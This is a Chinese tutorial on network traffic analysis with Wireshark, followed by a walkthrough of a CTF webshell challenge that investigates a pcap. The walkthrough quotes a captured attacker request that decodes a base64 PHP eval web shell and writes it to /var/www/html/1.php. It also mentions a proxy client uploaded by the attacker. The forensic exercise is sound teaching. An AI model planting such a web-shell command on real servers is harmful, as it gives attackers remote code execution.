流量分析基础

定义:

  流量分析(Traffic Analysis)是指对网络流量数据进行分析和解释,以获得有关网络中通信的信息和情报。这种技术可以用于网络安全、网络管理和网络优化等领域。

  网络流量包含了许多有关网络通信的细节信息,如源IP地址、目标IP地址、端口号、协议类型、数据包大小、传输速率等等。通过对这些信息进行分析和解释,可以获得对网络通信的深入理解,并发现潜在的问题和威胁。需要了解网络协议、数据包分析、安全攻防技术等相关知识。此外,还需要使用专业的流量分析工具,如Wireshark、tcpdump、Snort等等,以捕获和分析网络流量数据。在网络安全领域,流量分析被广泛应用于入侵检测、网络监控、漏洞分析等方面。例如,通过对网络流量进行分析和解释,可以发现恶意软件、网络钓鱼攻击、DDoS攻击等各种网络威胁,并采取相应的防御措施。

  wireshark:

一、Wireshark简介

Wireshark是一款世界范围最广、最好用的网络封包分析软件,功能强大,界面友好直观,操作起来非常方便。它的创始人是Gerald Combs,前身是Ethereal,作为开源项目经过众多开发者的完善它已经成为使用量最大的安全工具之一。在CTF中也经常会使用wireshark进行流量数据包分析,可以快速检测网络通讯数据,获取最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。用户将在图形界面中浏览这些数据,实时监控TCP、session等网络动态,轻松完成网络管理操作。其对pcap包分析过程中常用的功能基本上包括:数据包筛选、数据包搜索、流还原、流量提取等

二、安装与使用

去官网下载,按照相应指示安装即可,

Wireshark支持的网络类型:

InterfaceLinuxmacOSWindows
蓝牙
以太网
USB
无线局域网
PPP链路

打开后点击所需网关即可抓包

它提供了三个主要面板,包括:

  1. 抓包面板(Capture Panel):抓包面板用于捕获网络数据包,并显示已经捕获的数据包列表。在该面板中,可以选择捕获的网络接口、设置捕获过滤器、启动和停止抓包等操作。此外,还可以通过右键单击数据包,查看详细信息、导出数据包、跟踪TCP流等。

  2. 数据包列表面板(Packet List Panel):数据包列表面板显示已经捕获的数据包列表,其中每个数据包占据一行,并列出了有关该数据包的一些关键信息,如时间戳、源IP地址、目标IP地址、协议类型、数据包长度等。此外,还可以通过对列表进行排序、筛选、搜索等操作,方便用户查找和分析数据包。

  3. 数据包详情面板(Packet Detail Panel):数据包详情面板显示选定数据包的详细信息,包括各个协议层的数据结构和字段值。用户可以通过展开不同的节点,查看不同的协议头和数据负载,帮助用户深入理解数据包的内容和意义。

常用语法:

(在搜索框输入http即可看http的流量)

tcp:显示所有TCP协议的数据包
udp:显示所有UDP协议的数据包
http:显示所有HTTP协议的数据包
dns:显示所有DNS协议的数据包
icmp:显示所有ICMP协议的数据包

ip地址筛选:

ip.addr == 192.168.0.1:显示与指定IP地址相关的所有数据包
ip.src == 192.168.0.1 :显示源IP地址为指定地址的数据包
ip.dst == 192.168.0.2:显示目标IP地址为指定地址的数据包

端口筛选:

tcp.port ==  80:显示使用指定TCP端口的数据包
udp.port == 53:显示使用指定UDP端口的数据包

比较运算符:

==:等于,例如:http.request.method == "POST"
!=:不等于,例如:ip.addr != 192.168.0.1
<、>:小于、大于,例如:frame.len > 100 或 frame.len < 50,可以指定过滤数据包长度

数据包内容过滤规则:

http.request.method == "GET" 或 tcp.flags.syn == 1,可以通过指定数据包内容,只保留符合条件的数据包。

# 在TCP三次握手过程中,客户端向服务端发送一个SYN标志的数据包,表示请求建立连接。而tcp.flags.syn == 1就是Wireshark中用于匹配TCP SYN标志的过滤规则,其中1表示该标志位被置为1,表示该数据包是一个SYN数据包。当Wireshark捕获到一个TCP数据包时,会检查该数据包的TCP头部中的SYN标志位是否被置为1,如果符合条件,则该数据包会被匹配并显示出来。这样,用户就可以快速过滤出所有的TCP SYN数据包,方便进行相关的分析和处理。

复杂筛选:

ip.src == 192.168.0.1 and tcp.port == 80

这个表达式的作用是:选择源IP地址为192.168.0.1并且目标TCP端口为80的网络流量。这样可以过滤出与指定源IP地址和目标端口相关的流量,以便进一步分析和观察与该目标端口的通信相关的数据包。

解释每个部分的含义:

  • ip.src == 192.168.0.1:选择源IP地址为192.168.0.1的网络流量。
  • tcp.port == 80:选择目标TCP端口为80的网络流量。

通过组合这些条件,可以有效地过滤出特定源IP地址和目标端口的网络流量

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http.request.method==POST 

这个表达式的作用是:选择源IP地址为192.168.1.8或202.1.1.2,并且HTTP请求方法为POST的网络流量。这样可以过滤出满足这两个条件的网络流量,以便进一步分析和观察与POST请求相关的数据包。

解释每个部分的含义:

  • ip.addr == 192.168.1.8:选择源IP地址为192.168.1.8的网络流量。
  • ip.addr == 202.1.1.2:选择源IP地址为202.1.1.2的网络流量。
  • http.request.method==POST:选择HTTP请求方法为POST的网络流量。

蓝牙协议为obex协议

以下是一些用于匹配HTTP流量中的特定内容的语法:

  1. http.host == "www.example.com":匹配目标主机为"www.example.com"的HTTP请求和响应。

  2. http contains "login":用于匹配HTTP流量中包含"login"字符串的数据包。

  3. http.request.method == "POST":匹配使用HTTP POST方法发送请求的数据包。

  4. http.response.code == 200:匹配状态码为200的HTTP响应数据包。

  5. http.cookie contains "sessionid":匹配包含名为"sessionid"的HTTP Cookie数据包。

  6. http.content_type == "text/html":匹配Content-Type头部为"text/html"的HTTP数据包。

  7. http.request.uri contains "admin":匹配包含"admin"字符串的HTTP请求URI。

  8. http.request.uri matches ".*\.(jpg|png|gif)":匹配HTTP请求URI中以".jpg"、".png"或".gif"结尾的URI。

  9. http.user_agent matches "Mozilla.*":匹配User-Agent头部以"Mozilla"开头的HTTP请求数据包。

题目[陇剑杯2021webshell]:

1.分析数据包hack.pcap,黑客登录系统使用的密码是________。
2.分析数据包hack.pcap,黑客修改了一个文件日志,文件的绝对路径为________。
3.分析数据包hack.pcap,黑客获取webshell之后,权限是_________?
4.分析数据包hack.pcap,黑客写入的webshell文件名是_________。
5.分析数据包hack.pcap,黑客上传的代理工具客户端名字是__________。
6.分析数据包hack.pcap,黑客代理工具的回连服务端IP是___________。

 1、分析登录系统使用的密码

过滤语法:

http contains "login"

点击长度753那条,拉到下面看到使用的密码为:Admin123!@#

2、分析文件的绝对路径

因为题目中黑客修改了日志,所以直接搜.log

http contains ".log"

我们翻最大长度的且非404的包能看见日志路径和命令执行,不过这不是绝对路径,继续追踪http流(右击数据-->追踪流-->追踪http流)

重点在于:

 variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');HTTP/1.1 200 OK

 拼接一下能得出文件的绝对路径是:/var/www/html/data/Runtime/Logs/Home/21_08_07.log

3、分析黑客获取webshell后的权限

搜索:

http contains "whoami"

出来的两条数据虽然有whoami但是没有权限,我们追踪http流,然后在里面搜索default(即默认权限)

[ 2021-08-07T17:37:59+08:00 ] 172.17.0.1 /index.php?m=home&a=assign_resume_tpl

ERR: ...............:./Application/Home/View/default/www-data

 权限是www-data

4、分析黑客写入的webshell文件名

第二题就能看见写入的是1.php


5.分析黑客上传的代理工具客户端名字

由上题可知webshell的连接密码是aaa,直接搜索aaa,然后追踪http流

翻到后面得到:

 

ThinkPHP/ 2021-08-07 05:59:50 4096 0777

Application/ 2021-08-07 05:59:49 4096 0777

data/ 2021-08-07 06:00:32 4096 0777

frpc 2021-08-07 09:42:32 9973760 0644

index.php 2021-08-07 05:59:50 2269 0777

1.php 2021-08-07 09:39:54 29 0644

favicon.ico 2021-08-07 05:59:50 1150 0777

install.php 2021-08-07 05:59:50 378 0777

frpc.ini 2021-08-07 09:42:17 240 0644

代理工具客户端名字是:frpc

6.分析代理工具的回连服务端IP

  黑客通过代理客户端写入文件并上传,在文件上传请求的包中,数据以16进制的形式呈现(因为在传输过程中,数据通常以二进制形式进行编码,可以通过将二进制数据转换为16进制来进行可视化展示和分析)

我们可以使用Burpsuite进行16进制转换,将抓取到的16进制数据复制到Burpsuite中。在Burpsuite中,找到并点击顶部菜单栏"Decoder"选项卡,在Decoder工具的界面上,选择"ASCII hex"选项(意味将16进制数据转换为ASCII字符串),然后点击"Decode"按钮。Burpsuite将会将16进制数据转换为相应的ASCII字符串。

代理工具的回连客户端IP是:192.168.239.123

相关参考:

Wireshark 的抓包和分析,看这篇就够了!_wireshark抓包数据怎么看-CSDN博客

CTF——流量分析题型整理总结_ctf流量分析-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/251835.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【漏洞复现】CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

漏洞描述 无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。在windows环境部署smanga安装环境面板,首先安装小皮面板,下载smanga项目,导入数据库,登录smanga,windows部署smanga。 /php/manga/delete.php接口处存在未…

分面中添加不同表格

简介 关于分面的推文&#xff0c;小编根据实际科研需求&#xff0c;已经分享了很多技巧。例如&#xff1a; 分面一页多图 基于分面的面积图绘制 分面中的细节调整汇总 分面中添加不同的直线 基于分面的折线图绘制 最近遇到了另一个需求&#xff1a;在分面中添加不同的表…

赵传和源代码就是设计-UMLChina建模知识竞赛第4赛季第23轮

参考潘加宇在《软件方法》和UMLChina公众号文章中发表的内容作答。在本文下留言回答。 只要最先答对前3题&#xff0c;即可获得本轮优胜。第4题为附加题&#xff0c;对错不影响优胜者的判定&#xff0c;影响的是优胜者的得分。 所有题目的回答必须放在同一条消息中&#xff0…

C语言之函数式宏

目录 函数和数据类型 函数式宏 函数和函数式宏 函数式宏和对象式宏 不带参数的函数式宏 函数式宏和逗号运算符 函数式宏和函数类似并且比函数更加灵活&#xff0c;下面我们就来学习函数式宏的相关内容。 函数和数据类型 我们来编写一个程序&#xff0c;它能计算出所读取…

【网络安全】网络防护之旅 - 点燃网络安全战场的数字签名烟火

​ &#x1f308;个人主页&#xff1a;Sarapines Programmer&#x1f525; 系列专栏&#xff1a;《网络安全之道 | 数字征程》⏰墨香寄清辞&#xff1a;千里传信如电光&#xff0c;密码奥妙似仙方。 挑战黑暗剑拔弩张&#xff0c;网络战场誓守长。 ​ 目录 &#x1f608;1. 初识…

计算机网络:DNS域名解析系统

我最近开了几个专栏&#xff0c;诚信互三&#xff01; > |||《算法专栏》&#xff1a;&#xff1a;刷题教程来自网站《代码随想录》。||| > |||《C专栏》&#xff1a;&#xff1a;记录我学习C的经历&#xff0c;看完你一定会有收获。||| > |||《Linux专栏》&#xff1…

Java 第13章 异常 本章作业

1 编程 两数相除的异常处理 各自属于哪些异常&#xff1a; 数据格式不正确 NumberformatException 缺少命令行参数 ArrayIndexOutOfBoundsException 除0异常处理 ArithmeticException ArrayIndexOutOfBoundsException 为数组下标越界时会抛出的异常&#xff0c;可以在检测到命…

swing快速入门(十三)

注释很详细&#xff0c;直接上代码 上一篇 新增内容 1.Dialog&#xff08;模式对话框和非模式对话框&#xff09; 模式对话框&#xff1a;在对话框没有消失之前无法操作父窗口 非模式对话框&#xff1a;对话框的出现不会影响对父窗口的操作 2.setButton&#xff08;对话框设置…

Chromadb词向量数据库总结

简介 Chroma 词向量数据库是一个用于自然语言处理&#xff08;NLP&#xff09;和机器学习的工具&#xff0c;它主要用于词嵌入&#xff08;word embeddings&#xff09;。词向量是将单词转换为向量表示的技术&#xff0c;可以捕获单词之间的语义和语法关系&#xff0c;使得计算…

arthas 线上排查问题基本使用

一、下载 [arthas下载地址]: 下载完成 解压即可使用 二、启动 java -Dfile.encodingUTF-8 -jar arthas-boot.jar 如果直接使用java -jar启动 可能会出现乱码 三、使用 启动成功之后 arthas会自动扫描当前服务器上的jvm进程 选择需要挂载的jvm进程 假如需要挂在坐标【1】的…

机器视觉工程师为什么如何找一个高薪的企业上班

竟然那么辛苦&#xff0c;为什么不找一个工资高的地方被压榨呢&#xff0c;在现在的公司学到的技术&#xff0c;给不到你应有的薪资&#xff0c;那你就只能跳槽来获得&#xff0c;各行各业都有牛人和大佬&#xff0c;各行各业都有高薪的人&#xff0c;只不过看你能不能到那个高…

nginx_rtmp_module 之 ngx_rtmp_live_module模块

模块作用 直播模块代码 ngx_rtmp_live_module.c&#xff0c;主要作用是&#xff1a;当客户端推流或者拉流的时候&#xff0c;创建的rtmp session会加入到 live 模块的存储链表中。 模块配置命令 static ngx_command_t ngx_rtmp_live_commands[] {{ ngx_string("live&…

【Linux】键盘高级操作技巧

命令行最为珍视的目标之一就是懒惰&#xff1a;用最少的击键次数来完成最多的工作。另一个目标是你的手指永 远不必离开键盘&#xff0c;永不触摸鼠标。因此&#xff0c;我们有必要了解一些键盘操作&#xff0c;使我们用起来更加的迅速和高效。 移动光标 在前面介绍过上下左右…

JVM-2-对象

对象创建 当Java虚拟机遇到一条字节码new指令时&#xff0c;首先将去检查这个指令的参数是否能在常量池中定位到一个类的符号引用&#xff0c;并且检查这个符号引用代表的类是否已被加载、解析和初始化过。如果没有&#xff0c;那必须先执行相应的类加载过程。 为对象分配空间…

visual Studio MFC 平台实现图片的傅里叶变换

图片的傅里叶变换 本文主要讲解傅里叶变换的基本数学概念与物理概念&#xff0c;并本文使用visual Studio MFC 平台实现对傅里叶变换在图片上进行了应用。 一、傅里叶变换的原理 在这里推荐一篇讲得非常形象的文章通俗讲解&#xff1a;图像傅里叶变换 1.1 傅里叶变换原理的说明…

C++ 二叉搜索树(BST)的实现(非递归版本与递归版本)与应用

C 二叉搜索树的实现与应用 一.二叉搜索树的特点二.我们要实现的大致框架三.Insert四.InOrder和Find1.InOrder2.Find 五.Erase六.Find,Insert,Erase的递归版本1.FindR2.InsertR3.EraseR 七.析构,拷贝构造,赋值运算符重载1.析构2.拷贝构造3.赋值运算重载 八.Key模型完整代码九.二…

Prometheus 监控笔记(1):你真的会玩监控吗?

认识Prometheus Prometheus 是一种开源的系统和服务监控工具&#xff0c;最初由 SoundCloud 开发&#xff0c;后来成为继 Kubernetes 之后云原生生态系统中的一部分。在 Kubernetes 容器管理系统中&#xff0c;通常会搭配 Prometheus 进行监控&#xff0c;同时也支持多种 Expo…

股票价格预测 | Python实现基于ARIMA和LSTM的股票预测模型(含XGBoost特征重要性衡量)

文章目录 效果一览文章概述模型描述源码设计效果一览 文章概述 Python实现基于ARIMA和LSTM的股票预测模型(Stock-Prediction) Data ExtractionFormatting data for time seriesFeature engineering(Feature Importance using X

2023NEFU实习项目解析 - 中俄贸易供需服务平台

文章目录 项目概述项目初始化搭建项目初始框架配置Tomcat建立项目数据库编写统一返回类及其工具类编写数据库工具类通过Filter解决Response返回中文乱码问题使用Filter解决权限校验问题 项目主干开发用户登录企业管理&#xff08;分页查询原生实现&#xff09;上传VIP申请书模板…

【ArkTS】生命周期

页面生命周期 通常Entry修饰的组件称为页面&#xff0c;其拥有页面生命周期 onPageShow&#xff1a;页面每次显示时触发。onPageHide&#xff1a;页面每次隐藏时触发&#xff08;通常是路由跳转到其他页面了&#xff09;。onBackPress&#xff1a;当用户点击返回按钮时时触发…